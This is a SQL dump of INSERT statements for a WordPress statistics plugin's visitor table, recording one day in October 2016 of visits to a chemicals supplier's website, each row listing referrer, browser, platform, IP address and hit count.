INSERT INTO `wp_statistics_visitor` VALUES (6742, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '158.116.225.13', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6743, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.205.25.183', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6744, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.211.80.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6745, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.96.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6746, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.134.46.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6747, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.23.203.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6748, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '23.105.131.207', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6749, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '222.122.190.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6750, '2016-10-20', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj51q-4hunPAhWIiVQKHaEKD6UQjBAIKDAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.136499718,d.c2I', 'MSIE', 'Windows', '11.0', '', '124.46.22.62', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6751, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '86.62.112.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6752, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.99', '', '104.160.5.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6753, '2016-10-20', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.160.5.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6754, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6755, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.211.184.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6756, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '134.96.17.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6757, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.143.62.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6758, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.109.34.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6759, '2016-10-20', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.119.115.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6760, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '117.247.177.180', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6761, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.135.57.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6762, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.203.240.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6763, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.40.61.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6764, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '213.125.24.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6765, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.197.194.109', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6766, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.24.82.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6767, '2016-10-20', 'https://www.miller-stephenson.com', 'sadfasdfsadf', 'Unknown', 'Unknown', '', '52.90.241.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6768, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '193.204.167.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6769, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.68.80.125', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6770, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.194.246.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6771, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.190.231.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6772, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.171.108.27', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6773, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6774, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6775, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '156.212.31.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6776, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.107.88.183', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6777, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.45.147.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6778, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.155.39.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6779, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.225.77.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6780, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.237.140.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6781, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.63.181.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6782, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.113.108.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6783, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.164.212.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6784, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.54.214.71', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6785, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6786, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '14.199.219.160', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6787, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.164.128.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6788, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6789, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.88.129.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6790, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.248.184.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6791, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '114.31.23.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6792, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.134.82.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6793, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.173.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6794, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.157.80.221', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6795, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.153.130.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6796, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.150.191.65', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6797, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.72.53.194', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6798, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '114.79.147.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6799, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.206.125.51', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6800, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.84.38.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6801, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.170.159.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6802, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.46.124.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6803, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.79.53.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6804, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.44.135.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6805, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.15.155.6', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6806, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.94.55.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6807, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.165.114.64', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6808, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.95.0.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6809, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.190.171.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6810, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.199.69.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6811, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.202.70.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6812, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.22.251.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6813, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.145.231.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6814, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.153.87.51', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6815, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.3.3.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6816, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.178.210.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6817, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.108.194.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6818, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.140.85.202', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6819, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.125.90.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6820, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.51.235.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6821, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.24.102.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6822, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.34.52.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6823, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.223.140.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6824, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.143.97.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6825, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.54.32.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6826, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.229.121.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6827, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.240.183.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6828, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.159.29.99', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6829, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.173.2.210', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6830, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.36.62.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6831, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.187.37.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6832, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.148.134.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6833, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '88.79.164.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6834, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.49.175.167', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6835, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.48.5.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6836, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '14.139.216.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6837, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.53.37.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6838, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.53.44.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6839, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '23.27.248.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6840, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.50.137.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6841, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.194.155.93', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6842, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.139.81.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6843, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.28.166.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6844, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.42.56.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6845, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.253.12.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6846, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.197.236.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6847, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.50.46.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6848, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.143.68.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6849, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.101.68.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6850, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.82.94.225', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6851, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.28.143.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6852, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.240.238.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6853, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.200.215.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6854, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '46.0', '', '109.205.5.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6855, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.216.236.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6856, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.125.116.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6857, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.42.28.191', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6858, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '157.27.143.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6859, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.213.111.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6860, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.49.225.96', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6861, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.52.127.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6862, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.76.119.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6863, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.186.154.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6864, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.147.99.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6865, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '68.231.82.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6866, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.144.47.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6867, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.207.61.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6868, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.59.62.82', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6869, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.176.39.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6870, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.185.54.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6871, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.227.70.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6872, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.250.170.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6873, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '160.176.141.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6874, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.149.158.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6875, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.252.211.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6876, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.180.32.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6877, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.246.0.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6878, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.57.169.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6879, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.60.158.220', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6880, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '172.8.145.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6881, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.142.254.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6882, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.48.43.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6883, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.231.28.48', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6884, '2016-10-20', 'https://mmr.mschem.com/miller/pdf/MS-900.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '181.124.98.154', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6885, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.88.61.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6886, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.242.34.176', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6887, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.211.147.215', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6888, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '198.99.190.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6889, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.34.194.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6890, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.140.0.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6891, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.235.47.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6892, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.159.16.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6893, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.93.160.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6894, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.94.47.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6895, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.80.212.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6896, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '220.124.226.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6897, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.252.73.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6898, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.138.239.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6899, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.133.232.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6900, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.86.142.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6901, '2016-10-20', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '6.0', '', '54.86.142.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6902, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.126.176.223', '000', 6, 0); 
